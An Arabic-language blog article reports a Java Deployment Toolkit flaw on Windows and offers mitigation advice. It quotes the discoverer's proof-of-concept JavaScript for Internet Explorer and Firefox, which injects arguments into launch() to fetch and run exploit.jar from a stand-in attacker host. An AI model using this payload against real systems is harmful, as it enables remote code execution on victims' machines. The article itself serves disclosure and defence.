ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز
اكتشف أحد مهندسي Google ثغرة خطيرة في
JAVA موجودة في جميع الاصدارات التي تم اطلاقها بعد Java 6 Update 10.
بحسب مكتشف الثغرة Tavis Ormandy والذي قام بنشر تفاصيلها بشكل علني
مستخدمي ويندوز بجميع اصداراته معرضين للاختراق عن طريق المتصفّح بغض
النظر عن نوعه طالما جافا منصّبة بالجهاز.
تعتبر هذه الثغرة شديدة الخطورة لأنها تعرض جميع اصدارات نظام ويندوز
للاختراق عن طريق المتصفّح بكل سهولة وذلك عن طريق توجيه المستخدم لرابط
يحتوي على كود يستغل خطأ في Java Deployment Toolkit التي تم اضافتها الى
JAVA 6 Update 10 مما يسمح له بتمرير ملف .jar الى Java Web Start (وهي
تقنيّة تسمح للمطورين بتشغيل برامجهم المبرمجة بلغة جافا من الانترنت عن
طريق بروتوكول JNLP) وتشغيله على جهاز المستخدم.
استغلال هذه الثغرة لا يتعلّق بالمتصفّح حيث يمكن استغلالها على
Internet Explorer و Firefox أيضاً في نظام ويندوز. أما أنظمة لينوكس وماك
فعلى الأغلب أنها غير مصابة بهذه الثغرة.
كود الاستغلال في متصفّح Internet Explorer سيكون بالشكل:
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
أما متصفّح Mozilla Firefox فالكود هو نفسه تقريباً:
var o = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit"
document.body.appendChild(o);
o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
بسبب خطأ في طريقة معالجة الدالة launch للرابط الذي وضعه المهاجم, هذا
مكّنه من حقن ملف .jar سيتم تمريره الى javaws التي بدورها ستقوم بتشغيله
على النظام. مكتشف الثغرة كتب أنه أبلغ Sun قبل نشرها بشكل علني لكن رد
الشركة أتى أن هذه الثغرة ليست خطيرة بما فيه الكفاية ليقوموا بكسر دورة
التحديث الخاصة بجافا.
شخصيّاً أجد الثغرة خطيرة جداً لأن Java
تعتبر من الأمور الأساسية وموجودة في أغلب الأنظمة والسبب الآخر هو طبيعة
هذه الثغرة والثبات الكبير الذي عرفت به جافا! مع اضافة تقنيات جديدة من
الطبيعي أن تكتشف ثغرات جديدة ومن مدة بسيطة شركة Oracle أطلقت تحديث
لجافا لاصلاح 27 مشاكل أمنية فيها. كما أن هذه الثغرة لا تستغل خطأ في
الذاكرة مثلاً أو تحقن شيل كود وبهذه الحالة لا يوجد مشاكل مع تقنيات
الحماية مثل ASLR أو DEP لأن الاستغلال مختلف تماماً عن باقي ثغرات
المتصفح المعروفة وملف .jar سيعمل على النظام دون أي مشاكل.
مكتشف
الثغرة وضع بعض الحلول للحماية منها يمكنكم الاطلاع عليها من الرابط
الموجود بالأسفل, شخصيّاً أرى أن الحل الأفضل (والأسهل) هو استخدام
Firefox مع اضافة NoScript وبهذه الحالة ستكون قادر على التحكم بشكل كامل
بالأمور والسكريبتات التي سيتم تشغيلها على متصفّحك وهذا كفيل لحمايتك من
أغلب ثغرات المتصفح وليس هذه الثغرة فقط.